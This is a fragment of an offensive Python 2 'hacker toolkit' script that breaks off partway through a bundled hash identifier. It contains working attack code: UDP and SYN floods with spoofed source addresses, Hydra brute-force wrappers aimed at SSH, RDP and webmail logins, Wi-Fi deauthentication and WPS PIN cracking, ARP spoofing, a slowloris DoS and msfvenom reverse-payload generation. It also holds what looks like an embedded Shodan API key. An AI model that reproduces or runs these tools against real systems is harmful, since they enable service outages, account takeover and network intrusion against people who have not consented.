'\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + 